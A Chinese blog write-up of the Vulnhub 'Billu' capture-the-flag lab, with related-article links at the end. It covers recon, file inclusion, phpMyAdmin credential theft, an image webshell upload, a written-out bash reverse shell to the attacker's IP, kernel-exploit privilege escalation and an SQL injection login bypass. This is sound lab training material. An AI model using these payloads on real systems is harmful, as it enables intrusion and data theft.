Vulnhub靶场之Billu

访客4年前黑客资讯917

一、信息收集

使用nmap或netdiscover扫描确定其ip

1604148042_5f9d5b4acf60fafa4fdda.png!small?1604148043738

访问其80端口

1604148152_5f9d5bb874e648d213046.png!small?1604148154888

发现是一个登入界面,使用御剑后台扫描工具和kali的dirb扫描网站目录

御剑扫描结果:

1604149880_5f9d627812230c70ec94f.png!small?1604149887878

1604149955_5f9d62c3ba8ce5a4d0b13.png!small?1604149977045

dirb扫描结果:

1604149786_5f9d621a4e467f2025137.png!small?1604149802845

1604149880_5f9d6278390e3a1c057f7.png!small?1604149887887

现在收集到的信息有:

http://192.168.220.143/add.php文件上传

http://192.168.220.143/in/? ? phpinfo()

http://192.168.220.143/phpmyphpMyAdmin

http://192.168.220.143/test文件包含

1604150058_5f9d632a7e47b8c1b6f51.png!small?1604150059347

二、漏洞利用

文件包含

访问192.168.220.143/test.php使用brup抓包

将请求 *** 改为post1604151221_5f9d67b5726a09ddc2b6d.png!small?1604151222621

在Params中加参数file和对应的内容

1604151291_5f9d67fb6f5977fce8a37.png!small?1604151292453

单包发送,得到对应文件的内容

1604151325_5f9d681de3ade2d22466a.png!small?1604151326857

证明该页面存在文件包含漏洞,查看c.php(猜测可能是配置文件)

1604151184_5f9d6790a1f9c332680bb.png!small

得到数据库连接用户名密码,在phpMyAdmin页面使用用户名密码登入

1604151435_5f9d688b624dcf14ff8ed.png!small?1604151436207

成功登入,得到登入web界面的用户名密码

1604151586_5f9d6922554ed10a1af64.png!small?1604151587363

成功登入web界面

1604151709_5f9d699d9c0ca910682fb.png!small?1604151710713

文件上传漏洞

选择添加用户,发现可以上传文件,开始上传一句话图片木马

1604152163_5f9d6b639459a54c0b164.png!small?1604152170658

访问http://192.168.220.143/panel.php?1=phpinfo(); 使用brup抓包,修改load参数为图片地址

1604158736_5f9d85100d276e364e7ae.png!small?1604158738203

使用一句话木马反弹shell

发现成功显示了phpinfo() ,说明可以反弹shell

使用brup的编码模块对echo 'bash -i >& /dev/tcp/192.168.220.146/4444 0>&1' | bash进行url编码

注意:ip是kali的ip,端口是监听的端口,要写单引号

1604159682_5f9d88c287a99b298fdf5.png!small?1604159682700

在kali中开启监听

1604159511_5f9d8817a3c97648afc7c.png!small?1604159511634

使用burp构造payload,点击Go访问

注意:url编码的代码要加到system("");里

1604161424_5f9d8f906968e62715483.png!small?1604161424450

成功反弹shell

1604161445_5f9d8fa53500a5dc00373.png!small?1604161445161

三、权限提升

查看那个目录有写权限,打算写一个一句话木马

1604330488_5fa023f8e39293ba7de00.png!small?1604330490858

进入uploaded_images目录,写木马

1604331142_5fa02686ec05f010969f5.png!small?1604331144840

拿到webshell,查看系统和内核版本

1604331207_5fa026c78039afd35e4ba.png!small?1604331209315

ubuntu 12.04 --> 37293.c提权

使用kali的searchsploit命令搜索提权代码,使用37292.c提权,下载文件到kali

1604331498_5fa027ea7d5d767533330.png!small?1604331500378

然后拷贝到真机,绕后通过菜刀上传到目标机器1604331566_5fa0282edf89c646e647e.png!small?1604331568726

编译提权文件
1604331685_5fa028a5db1f7bfc9b4f3.png!small?1604331687756

执行编译后的执行文件,成功提权到root权限

1604331697_5fa028b1a468199a3b301.png!small?1604331699496

其他思路:

一、走ssh

爆破phpmy目录下的文件

1604333118_5fa02e3ed5288c23a113e.png!small?1604333120725

使用文件包含漏洞,查看config.inc.php文件内容

1604333643_5fa0304b0ebcd31311c0d.png!small?1604333644986

可以看到账号密码,直接使用此账号密码ssh连接目标主机,拿到root权限

1604333733_5fa030a584561224a1c9b.png!small?1604333735474

二、sql注入登入网站

使用文件包含漏洞查看index.php源码,分析其过滤规则,然后构造payload绕过

1604339284_5fa04654bd3a2f4e6f1b1.png!small?1604339286619

最后测试出uname=or 1=1#? pass=\? ? 能成功登入

加 \ 号是为了让后面的unmae逃逸出来,使用此payload的后的sql语句:

select * from auth where pass='\' and uname=' or 1=1#'

相关文章

海水为什么是咸的(这些你不知道的事)

海水为什么是咸的(这些你不知道的事)

海水为什么那么咸,这确实是一个问题,不过在这个问题之前首先要来解决另一个问题!地球上这么多水是从哪里来的?可能很多人都有想过这个问题,但我们今天试图来简单的解释下! 地球水体的来源途径有几个:...

花钱查别人微信记录靠谱吗?黑客怎么查微信聊天记录呢

花钱查别人微信记录靠谱吗?黑客怎么查微信聊天记录呢前段时间有很多客户问小编,网络推广专员每天的工作流程是什么呢,其实网络推广专员的工作流程是很繁琐的,那么接下来帝佑小编就为大家解答一下这个问题吧!...

一般智商的人能当黑客吗(什么样的人能成为黑客)

一般智商的人能当黑客吗(什么样的人能成为黑客)

本文目录一览: 1、黑客智商很高么? 2、黑客,你们是不是都是高学历、高智商啊?不要鄙视我这个小白 - - 3、黑客是什么样的人? 4、想做一个黑客普通的不能再普通的智力可以不?至少要什么...

黑客帝国电视剧剧情介绍(黑客帝国剧情详细介绍)

黑客帝国电视剧剧情介绍(黑客帝国剧情详细介绍)

本文导读目录: 1、外国电视剧,可能是美剧,记忆中剧情片段,求片名。 2、黑客帝国 3、黑客帝国的剧情 4、黑客帝国剧情 5、黑客帝国的主演是谁? 6、黑客帝国的剧情问题??...

怎么找专门盗QQ号的,闲鱼被骗找黑客有用吗,黑客用别人家的网站

第三种是登录承认的方法,这种方法不需求输入验证码,而是经过登录承认点击的方法来完结双要素认证的进程,这种方法是经过公钥加密算法来承认你的身份,运用会生成一对公私钥,私钥存储在本地,公钥发送给服务端作为...

大明之超级黑科技明末无限暴兵(明末无限暴兵系统)

大明之超级黑科技明末无限暴兵(明末无限暴兵系统)

本文导读目录: 1、八百章到一千章的小说 2、找一本小说 3、找本小说 4、求好看的小说 5、超好看的小说 6、有没有人看过这本穿越小说阿 7、找一本穿越小说 8、求好看小...